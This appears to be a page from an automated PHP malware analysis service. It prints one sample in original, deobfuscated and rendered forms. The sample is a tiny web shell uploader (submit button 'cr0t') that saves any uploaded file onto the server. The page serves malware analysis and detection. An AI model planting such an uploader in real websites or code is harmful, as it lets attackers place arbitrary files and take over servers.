PHP Malware Analysis

KY1Pg3mM

md5: 19eef9a0587bc1a200a72931a6088e2f

Jump to:

Screenshot


Attributes

Files

Input


Deobfuscated PHP code

<?php

if ($_POST) {
    if (@copy($_FILES["0"]["tmp_name"], $_FILES["0"]["name"])) {
        echo "Y";
    } else {
        echo "N";
    }
} else {
    echo "<b></b><form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=cr0t>";
}

Execution traces


Generated HTML code

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">&lt;?php if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"&lt;b&gt;&lt;/b&gt;&lt;form method=post enctype=multipart/form-data&gt;&lt;input type=file name=0&gt;&lt;input name=0 type=submit value=cr0t&gt;";}?&gt;</pre></body></html>

Original PHP code

<?php if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"<b></b><form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=cr0t>";}?>